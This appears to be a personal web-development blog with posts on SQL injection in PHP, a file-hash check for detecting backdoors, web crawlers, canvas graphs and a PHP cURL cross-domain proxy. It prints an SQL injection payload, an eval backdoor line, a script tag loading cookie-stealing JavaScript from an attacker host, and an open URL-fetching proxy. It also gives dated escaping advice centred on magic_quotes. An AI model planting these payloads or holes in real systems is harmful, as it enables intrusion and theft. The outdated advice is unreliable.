Ted Gueniche

May 14, 2012
by ted

[You and PHP] against [SQL injections], a basic intro

SQL injections are a real threat. Even though it is an old type of attack, a lot of people are still unaware of how to protect their website. More importantly, what is PHP already doing to protect you?

For the purpose of this article I am talking about PHP (some parts might apply to other languages). For those who are not familiar with SQL injection, I would first recommend taking a look at Wikipedia. For those who are well aware of these attack vectors and already know how to defend themselves, this blog post is not for you!

There are three attack vectors: data extraction, data manipulation and remote code execution. In most cases, the attacker first gains access to the data, then starts modifying it and eventually executes code on the server. In other words, when an attacker gets access to your database, he can do whatever he wants with your data and can even compromise the whole server.

Until PHP 5.3, magic quotes were on by default (the feature was deprecated in 5.3 and removed in 5.4). That directive automatically escapes input variables, specifically to avoid SQL injection. It means that if I send a form, the server gets “ted\'s website” instead of “ted's website”. It was an effective way to prevent injection (except for numeric values, which are discussed later on). On top of that, programmers can manually escape input using mysql_real_escape_string.

Why are magic quotes a decent protection? In most cases, when an input is used in a SQL query, it is quoted:

SELECT content FROM _pages WHERE title = "$title"

Meaning that if I would want to exploit it, I could use as input:

-1" union select db_name() --

Now, with magic quotes on, it would be perceived as -1\" union select db_name() -- and the query would look like:

SELECT content FROM _pages WHERE title = "-1\" union select db_name() --"

The only reason the attack fails is that the input inside the query is quoted: there is a quote before the input and one after. And that is exactly where programmers create security flaws, usually with numeric values, because the quotes are not mandatory.

$id = mysql_real_escape_string($_POST['id']);

SELECT content FROM _pages WHERE id = $id

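In this case, the query is totally unsafe and neither magic_quotes nor mysql_real_escape_string can protect it from SQL injection. An input such as -1 union select db_name() contains no quote at all, so escaping leaves it unchanged and it becomes part of the query.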
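To see why escaping alone does not help here, the following JavaScript sketch mimics how the query text is assembled. It is only a simulation: `escapeQuotes` and `buildUnquoted` are hypothetical names, `escapeQuotes` is a rough stand-in for a quote-escaping function (not PHP's implementation), and no database is involved.

```javascript
// Hypothetical stand-in for a quote-escaping function: prefixes quotes
// and backslashes with a backslash. Not PHP's actual implementation.
function escapeQuotes(input) {
  return String(input).replace(/[\\'"]/g, "\\$&");
}

// Unquoted numeric parameter, as in the vulnerable query above.
function buildUnquoted(id) {
  return "SELECT content FROM _pages WHERE id = " + escapeQuotes(id);
}

// The payload contains no quote at all, so escaping leaves it untouched.
const payload = "-1 union select db_name()";
console.log(buildUnquoted(payload));
// SELECT content FROM _pages WHERE id = -1 union select db_name()
```

The escaped value is identical to the raw input, which is why the injected UNION ends up in the final query.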

The truth is, it is really easy to protect yourself. PHP does most of the work; just remember:

  • Turn the magic_quotes_gpc directive on (not always the best option) OR use mysql_real_escape_string on every input (recommended).
  • Quote every value in every SQL query.
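As a rough illustration of the two rules above, here is a JavaScript sketch that only builds the query text. The helper names (`escapeQuotes`, `quoted`, `asInteger`) are hypothetical, and the digits-only check for numeric values is an extra precaution that the rules above do not mention.

```javascript
// Hypothetical helpers, for illustration only.
function escapeQuotes(input) {
  return String(input).replace(/[\\'"]/g, "\\$&");
}

// Rules 1 and 2 together: escape the input and always wrap it in quotes.
function quoted(value) {
  return '"' + escapeQuotes(value) + '"';
}

// Extra precaution (an assumption, not from the rules above):
// for numeric columns, accept digits only.
function asInteger(value) {
  if (!/^-?\d+$/.test(String(value))) {
    throw new Error("not an integer: " + value);
  }
  return parseInt(value, 10);
}

console.log("SELECT content FROM _pages WHERE id = " + quoted("-1 union select db_name()"));
// SELECT content FROM _pages WHERE id = "-1 union select db_name()"
```

Once quoted, the payload is compared as a plain string value instead of being interpreted as SQL.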

What is difficult to understand is why enormous projects like Sony’s website are vulnerable to such attacks. Security should always be one of the top concerns in any web-based project. I would even say that any project should be designed around security.

A last word on the subject: I did not mention prepared statements or stored procedures, even though they are a really good protection against SQL injection. If you have never heard of them, you should take a look here. I recommend using one of them over magic_quotes!




July 21, 2011
by ted

How to build a simple web crawler

I always wanted to be able to automate an HTTP browsing process, for example to extract every article about a specific subject from a website, or to diagnose a website by checking the availability and speed of each page. There are tons of applications for such a bot. It has to be able to make an HTTP request to a website, perform a specific action for each page, and use some kind of heuristic function to choose which page to visit next.

The program is divided into a series of steps:

  1. Generating the HTTP request toward the right website/page.
  2. Wrapping the request with the headers of each layer.
  3. Sending the request and getting the response.
  4. Extracting the HTML code from the response.
  5. Executing a callback function on the response.
  6. Deciding which page will be analyzed next.
  7. Repeat.
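The steps above can be sketched as a small loop. This is a minimal JavaScript sketch under a few assumptions: the names `crawl`, `fetchPage` and `onPage` are hypothetical, the HTTP part (steps 1 to 4) is delegated to an injected `fetchPage` function, links are found with a naive regular expression, and the "heuristic" is a plain first-in, first-out queue.

```javascript
// Minimal crawl loop. `fetchPage` is injected so the sketch stays independent
// of any HTTP library: it takes a URL and resolves to the page's HTML.
async function crawl(startUrl, fetchPage, onPage, maxPages = 10) {
  const queue = [startUrl];   // pages waiting to be visited
  const visited = new Set();  // pages already processed

  while (queue.length > 0 && visited.size < maxPages) {
    const url = queue.shift();           // step 6: pick the next page (FIFO)
    if (visited.has(url)) continue;
    visited.add(url);

    const html = await fetchPage(url);   // steps 1 to 4
    onPage(url, html);                   // step 5: callback

    // Collect links from href="..." attributes and resolve them against the page URL.
    for (const match of html.matchAll(/href="([^"]+)"/g)) {
      try {
        const next = new URL(match[1], url).href;
        if (!visited.has(next)) queue.push(next);
      } catch (e) {
        // ignore malformed URLs
      }
    }
  }
  return [...visited];                   // step 7 is the loop itself
}

// Usage with a made-up, in-memory "website" instead of real HTTP requests.
const fakePages = {
  "http://example.test/": '<a href="/a">a</a> <a href="/b">b</a>',
  "http://example.test/a": '<a href="/">home</a>',
  "http://example.test/b": "",
};
const fetchFake = async (url) => fakePages[url] || "";

crawl("http://example.test/", fetchFake, (url) => console.log("visited", url));
```

Swapping `fetchFake` for a function that performs a real HTTP request would turn the sketch into an actual crawler; a different queue ordering would give a different heuristic.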

This program could easily be developed as desktop software or as a web app using PHP. I won’t go any further since there are a lot of different bots doing this. But if you are actually building one, let me know!

List of existing HTTP bots (taken from wikipedia):

  • Aspseek is a crawler, indexer and a search engine written in C++ and licensed under the GPL
  • crawler4j is a crawler written in Java and released under an Apache License. It can be configured in a few minutes and is suitable for educational purposes.
  • DataparkSearch is a crawler and search engine released under the GNU General Public License.
  • GNU Wget is a command-line-operated crawler written in C and released under the GPL. It is typically used to mirror Web and FTP sites.
  • GRUB is an open source distributed search crawler that Wikia Search <http://wikiasearch.com> uses to crawl the web.
  • Heritrix is the Internet Archive’s archival-quality crawler, designed for archiving periodic snapshots of a large portion of the Web. It was written in Java.
  • ht://Dig includes a Web crawler in its indexing engine.
  • HTTrack uses a Web crawler to create a mirror of a web site for off-line viewing. It is written in C and released under the GPL.
  • ICDL Crawler is a cross-platform web crawler written in C++ and intended to crawl Web sites based on Web-site Parse Templates using computer’s free CPU resources only.
  • mnoGoSearch is a crawler, indexer and a search engine written in C and licensed under the GPL (Linux machines only)
  • Nutch is a crawler written in Java and released under an Apache License. It can be used in conjunction with the Lucene text-indexing package.
  • Open Search Server is a search engine and web crawler software released under the GPL.
  • Pavuk is a command-line Web mirror tool with an optional X11 GUI crawler, released under the GPL. It has a bunch of advanced features compared to wget and httrack, e.g., regular expression based filtering and file creation rules.
  • the tkWWW Robot, a crawler based on the tkWWW web browser (licensed under GPL).
  • YaCy, a free distributed search engine, built on principles of peer-to-peer networks (licensed under GPL).




July 12, 2011
by ted

Website hash check – adding another security layer

This article presents an implementation of a validation mechanism for a website. The objective behind this is to detect any file modifications made by a bad guy.

In a typical case, an attacker exploits a website and hides a backdoor in a file in order to easily regain access to the website. A backdoor can be as simple as a single line that evaluates a request parameter, for example:

    eval($_POST['exploit']);

All the attacker has to do after that is to send an HTTP POST request with an “exploit” parameter containing some PHP code.

Instead of installing a backdoor, the attacker could also include some JavaScript on every page of the infected website in order to steal cookie information or to carry out any other XSS attack. For example, he would automatically include the following snippet on every HTML page:

<script type='text/javascript' src='http://www.HackerWebsite.com/xss.js'></script>

So I am about to show you a way to detect those types of intrusion. If you have never heard of hashing or are not quite sure how it works, go take a look here! The hashing process is divided into two parts:

  1. Generating and saving the file signature (using a hashing algorithm) for each file of the website.
  2. Periodically checking if any file has been changed by comparing with the saved signatures.

I am using the SHA1 hash algorithm (you can use any other algorithm; just keep in mind that MD5 is no longer considered secure, and SHA1 itself has known weaknesses, so SHA-256 is a safer choice). The process of generating and saving the file signatures is almost the same as checking those signatures: both involve browsing through the directory tree and performing an action on each file encountered.
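Before looking at the PHP version, here is the same two-part idea as a compact JavaScript (Node.js) sketch. It is not the code from the sources: the function names `generateSignatures` and `checkSignatures` are hypothetical, and the signature list is kept as a plain object rather than saved to a file.

```javascript
const crypto = require("crypto");
const fs = require("fs");
const path = require("path");

// Part 1: walk `dir` recursively and return { relativePath: sha1Hex } for every file.
function generateSignatures(dir, root = dir, out = {}) {
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      generateSignatures(full, root, out);
    } else if (entry.isFile()) {
      const digest = crypto.createHash("sha1").update(fs.readFileSync(full)).digest("hex");
      out[path.relative(root, full)] = digest;
    }
  }
  return out;
}

// Part 2: compare a saved signature list with the current state of the tree.
function checkSignatures(saved, current) {
  const changes = [];
  for (const file of Object.keys(current)) {
    if (!(file in saved)) changes.push({ file, status: "added" });
    else if (saved[file] !== current[file]) changes.push({ file, status: "modified" });
  }
  for (const file of Object.keys(saved)) {
    if (!(file in current)) changes.push({ file, status: "deleted" });
  }
  return changes;
}
```

A typical use would be to call `generateSignatures` once on a known-good copy of the site, store the result, and later pass it to `checkSignatures` together with a freshly generated list.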

So to make the process reusable (not necessarily easier to understand), I created a function that navigates through the directories and takes two callback functions as parameters. One of them is called for every file encountered and the other one for each directory. Here’s the code:

//Class representing a file
class file
{
    public $name;
    public $path;
    public $hash;
}

//Navigate recursively through all the subdirectories of the $dir parameter
//@$callbackFile: function called for every file encountered while navigating
//@$callbackDir: function called before navigating into any subdirectory
function browse($dir, $callbackFile, $callbackDir)
{
    //if the directory exists and we have enough permission
    if($handle = opendir($dir))
    {
        //calling the directory function for the current directory
        //(the argument passed here is an assumption)
        $callbackDir($dir);

        //for each item in the directory
        while(FALSE !== ($file = readdir($handle)))
        {
            //Items called . and .. exist in each directory and we are not working on them
            if($file != "." && $file != "..")
            {
                //if the current item is a directory
                if(is_dir($dir .'/'. $file) == true)
                {
                    browse($dir .'/'. $file, $callbackFile, $callbackDir);
                }
                //if it is a file
                else
                {
                    $cur = new file();
                    $cur->name = $file;
                    $cur->path = $dir .'/'. $file;
                    $callbackFile($cur); //callback function
                    unset($cur); //deleting the file object
                }
            }
        }
        closedir($handle); //closing current directory
    }
    else
    {
        echo "Fail opendir: '". $dir ."'";
    }
}

We are missing the hash class:

//Helper class to hash various objects
class hashing
{
    //Hash a file
    //@path: relative path from this php file to the targeted file
    //@algo: name of the hashing algorithm (sha1, md5, ...)
    public static function fileHash($path, $algo)
    {
        //the exact condition used in the full sources is an assumption
        if(is_file($path) && is_readable($path))
            return hash($algo, file_get_contents($path));
        else
            return -1;
    }
}

And finally here are the full sources, containing all the other required functions.

In order to test it, extract all the files into a directory on your local server and visit index.php. Click on the “Generate” link and it should generate a list of signatures for each directory and save them in “hindex.dat”. Now try to modify or add any file in the directory tree, visit index.php again and click on “Check” this time. You should now see an error message saying that a file has been modified or added.

So yes, it works, and no, it is not perfect. An attacker could modify a file and update the list of signatures. Or he could delete the list of signatures and you would not know which file has been modified or added. All I did was a proof of concept; if I get the time I’ll add the following features:

  • Encrypt the list of signatures so that it can be neither read nor modified.
  • Generate a signature of all the signature lists and save it in the database.
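One possible way to approach the second feature is a keyed hash (HMAC) computed over the whole signature list. The JavaScript (Node.js) sketch below is an assumption about how it could look, not part of the proof of concept; `signSignatureList` and the secret key are hypothetical, and storing the result in a database is left out.

```javascript
const crypto = require("crypto");

// Produce one keyed signature covering the whole list of file signatures.
// Without `secretKey`, a matching value cannot be recomputed after tampering.
function signSignatureList(signatures, secretKey) {
  const canonical = Object.keys(signatures)
    .sort()                                        // stable order, independent of insertion
    .map((file) => file + ":" + signatures[file])
    .join("\n");
  return crypto.createHmac("sha256", secretKey).update(canonical).digest("hex");
}
```

If the stored value no longer matches the one recomputed from the current signature list, the list itself has been altered.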


June 27, 2011
by ted

Data visualization engine – Part 1: visualizing

I want to make a score visualization engine that would be used to represent a huge amount of data using graphs and statistics. The option to generate custom on-the-go graphs is mandatory and should be simple to achieve. I’ll divide the algorithm into three parts (three articles):

  1. Acquiring the data.
  2. Saving and organizing the data.
  3. Visualizing the data.

In this article I’ll start with how to visualize the data. Javascript and HTML5 will be the main technologies used in order to draw the graphs. I’ll start with a concrete example and I’ll go step by step to build the visualization engine with the example.

Context: A dart game where each player starts with 200 points and the goal is to get to a score of zero using 3 darts each round. In order to win, a player has to get to zero or under.

Objective: I want to make a graph representing the sum of the darts of each player for each round of a game.


Round # Ted (points) Justin (points)
1 5 18 5 17 19 8
2 4 4 1 40 18 17
3 16 11 7 8 8 7
4 38 16 14 51 21
5 19 15 11 12 11 1
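As a small worked example of the objective, the JavaScript sketch below computes the per-round sums for the first three rounds. It assumes that the first three values of each row are Ted's darts and the next three are Justin's; the function names are hypothetical.

```javascript
// Darts thrown in rounds 1 to 3, copied from the table above
// (assuming three darts for Ted followed by three for Justin).
const rounds = {
  Ted:    [[5, 18, 5], [4, 4, 1], [16, 11, 7]],
  Justin: [[17, 19, 8], [40, 18, 17], [8, 8, 7]],
};

// Sum of the darts for each round.
function roundSums(playerRounds) {
  return playerRounds.map((darts) => darts.reduce((a, b) => a + b, 0));
}

// Score left after each round, starting from 200 points.
function remainingScores(playerRounds, start = 200) {
  let score = start;
  return roundSums(playerRounds).map((sum) => (score -= sum));
}

console.log(roundSums(rounds.Ted));          // [ 28, 9, 34 ]
console.log(remainingScores(rounds.Justin)); // [ 156, 81, 58 ]
```

These per-round sums are the kind of values that end up on the Y axis of the graph.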


Let’s make a first graph that has the score on the Y axis and the round number on the X axis. Each player will be represented by a color. Each set of coordinates will be based on the collected data and represent the sum of the darts at a given round of the game. The graph should look like this:

The previous graph used a point-to-point line and also a rectangle representing each point. In order to draw it, I’ll use an HTML canvas element to display the drawing and a JavaScript script to draw on it.

Here’s the HTML code for the canvas:

		<canvas id="graph"></canvas>

Now I will start writing the JavaScript. I begin by assigning a variable to the canvas object and then declare a function that draws a line between two sets of coordinates:

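var graph = document.getElementById("graph");
graph.height = 400; //size of the canvas drawing surface
graph.width = 600;
var g = graph.getContext('2d');
g.height = graph.height; //copied onto the context for the drawing functions
g.width = graph.width;

var drawLine = function(x1,y1,x2,y2, color)
{
	y1 = g.height - y1; //inverting y axis
	y2 = g.height - y2;
	g.strokeStyle = color;
	g.beginPath();
	g.moveTo(x1, y1); //start of the segment
	g.lineTo(x2, y2); //end of the segment
	g.stroke(); //actually paint the line
};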

And here’s another useful function that draws rectangles instead of lines:

var drawRect = function(x,y,height,width,color)
{
 y = g.height - y; //inverting y axis
 height = g.height - height;

 g.fillStyle = color;
 g.fillRect(x, y, width, height); //rect() alone only adds to the path and paints nothing
};

Given a fixed interval for the x axis, that is all I needed in order to build this graph.
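To make the role of the fixed interval concrete, here is a short JavaScript sketch that turns a series of scores into canvas coordinates. `toCanvasPoints` is a hypothetical helper, not part of the sources; it only does the arithmetic and does not draw anything.

```javascript
// Convert a series of scores into canvas coordinates.
function toCanvasPoints(values, interval, canvasHeight) {
  return values.map((value, i) => ({
    x: (i + 1) * interval,    // fixed step along the x axis
    y: canvasHeight - value,  // the canvas origin is top-left, so y is inverted
  }));
}

console.log(toCanvasPoints([41, 18, 33], 20, 400));
// [ { x: 20, y: 359 }, { x: 40, y: 382 }, { x: 60, y: 367 } ]
```

Each consecutive pair of points corresponds to one line segment of the graph.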


Here’s the code used to generate the previous graph. I start by declaring some data for the two players, then for each data point I draw the line segment and the rectangle.

//x interval
var intervall = 20;

var dataPlayer1 = [41, 18, 33, 36, 7, 17, 19, 59, 67];
var dataPlayer2 = [22, 54, 29, 43, 8, 38, 43, 26, 22];

//temporary variables used to draw lines, not rectangles
//(they hold the previous point of each line)
var tmpy1 = 0;
var tmpy2 = 0;
var tmpx1 = 0;
var tmpx2 = 0;

//controller for each data (starting at 0 so the first value is not skipped)
for(var i = 0 ; i < dataPlayer1.length && i < dataPlayer2.length; i++)
{
 //draw lines
 drawLine(tmpx1, tmpy1, (i+1) * intervall, dataPlayer1[i], "#000000");
 drawLine(200 + tmpx2, tmpy2, 200 + (i+1) * intervall, dataPlayer2[i], "#FF0033");

 //draw rectangles
 drawRect(intervall * i, dataPlayer1[i], 0, intervall, "rgba(0,0,0,0.4)");
 drawRect(200 + intervall * i, dataPlayer2[i], 0, intervall, "rgba(255,0,51,0.4)");

 //update temp variables
 tmpy1 = dataPlayer1[i];
 tmpx1 = (i+1) * intervall;
 tmpy2 = dataPlayer2[i];
 tmpx2 = (i+1) * intervall;
}

Grab the full sources here and check out the live example here.

There are countless ways to draw graphs using canvas. If you love the subject, then maybe you should look into circular diagrams or some 3D representations. Just remember that the code is executed by the client, so you need to avoid having a slow and heavy application.



June 1, 2011
by ted

Bypassing cross domain ajax restriction using php

This article presents a way to communicate between two distinct web servers using PHP. The goal is to send an HTTP request to another website in order to get some raw information (XML, JSON, …) or some HTML. The protocol of communication is HTTP and I will be using the cURL library, which PHP has supported since version 4.0.2, to send the request (cURL support ships with PHP, although the extension may need to be enabled on your server). This library provides a lot of control over the information you are sending and receiving between the two servers.

Here’s a simple script that sends an HTTP GET request to a server and displays the result:

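$ch = curl_init("http://www.ted-gueniche.com/");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); //return the response instead of printing it directly
echo curl_exec($ch);
curl_close($ch);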

To complete this example, the following code (placed at www.ted-gueniche.com) receives the HTTP request and answers with a short message.

 echo 'You successfully communicated with this server';

Some of you might ask why I did not use JavaScript to make the HTTP request. Well, most browsers forbid JavaScript from making requests to external domains (the same-origin policy), unless the remote website explicitly allows it. It means that this website (www.ted-gueniche.com) cannot use AJAX to request a page from google.com or any website other than ted-gueniche.com.
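The notion of "same website" used by browsers can be illustrated with a few lines of JavaScript. This is only a sketch of the comparison (scheme, host and port), with a hypothetical `sameOrigin` helper; it is not how a browser enforces the restriction internally.

```javascript
// Two URLs share an origin when scheme, host and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

console.log(sameOrigin("http://www.ted-gueniche.com/", "http://www.ted-gueniche.com/post.php")); // true
console.log(sameOrigin("http://www.ted-gueniche.com/", "http://www.google.com/"));               // false
```

A request from a page to its own post.php passes this check, which is what makes the approach described next possible.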

The previous technique is awesome, but it would be even better if it could communicate with a distant server asynchronously, like an AJAX request, meaning that we do not need to reload the page to make the request. Let’s create a JavaScript event that sends an AJAX request to the previous PHP code (the one that sends the HTTP request). That way we bypass the cross-domain limitation of AJAX.

The program is divided into three files:

  1. index.php is our main page, where the AJAX request originates.
  2. post.php is the script that sends the HTTP request using PHP cURL. This file is located on the same server as index.php.
  3. distant.php is located on another server and only generates some HTML when viewed.



<!-- index.php -->
<script type="text/javascript">
  //send an ajax request to "post.php" with the "url" parameter
  function sendHttp(url)
  {
    var localUrl = "post.php";
    var request = new XMLHttpRequest();

    request.open('POST', localUrl, true);	//setting up an asynchronous HTTP POST request
    request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    //Content-length and Connection are set by the browser itself

    request.onreadystatechange = notify;    //callback function
    request.send("url=" + encodeURIComponent(url));	//send the request

    function notify()
    {
      if(request.readyState == 4)         //the response is complete
      {
        //displaying the response in the #render element
        var render = document.getElementById("render");
        render.innerHTML = request.responseText;
      }
    }
  }
</script>

	<a id="targetEvent" onclick="sendHttp('http://www.google.ca'); return false;" href="#"> Click here to send an http request to my blog and receive its frontpage, without reloading the current page. </a>
	<div id="render"></div>



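//post.php
if(isset($_POST['url']) && strlen($_POST['url']) > 0 && strlen($_POST['url']) < 123)
{
	//initiate the request
	$ch = curl_init($_POST['url']);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); //return the response instead of printing it directly

	echo curl_exec($ch); //send the request and display the response

	curl_close($ch); //cleaning up
}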



 echo 'You successfully communicated with this server';

Once you have put index.php and post.php on one server and distant.php on another, visit index.php and click on the link (with the URL passed to sendHttp pointing at distant.php). It should display “You successfully communicated with this server” without reloading the page. I’ll finish with a word on security. You do not want people using “post.php” as a proxy or to take down your website. So I propose the following security measures:

  1. Check if the request’s IP is the same as the server’s IP.
  2. Generate a token on index.php that is sent to post.php, which verifies that the token is valid.
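The second measure could look roughly like the JavaScript (Node.js) sketch below, which only shows the token logic. Everything in it is an assumption made for illustration: the `makeToken` and `isValidToken` names, the use of a session id as input, the HMAC construction and the hard-coded secret.

```javascript
const crypto = require("crypto");

// Hypothetical server-side secret; in practice it would live in configuration.
const SECRET = "change-me";

// index.php side: derive a token from the visitor's session id.
function makeToken(sessionId) {
  return crypto.createHmac("sha256", SECRET).update(sessionId).digest("hex");
}

// post.php side: recompute the token and compare in constant time.
function isValidToken(sessionId, token) {
  const expected = Buffer.from(makeToken(sessionId), "hex");
  const received = Buffer.from(String(token), "hex");
  return received.length === expected.length &&
    crypto.timingSafeEqual(received, expected);
}
```

The page would embed the token in the AJAX request, and the proxy script would refuse to fetch anything when the check fails.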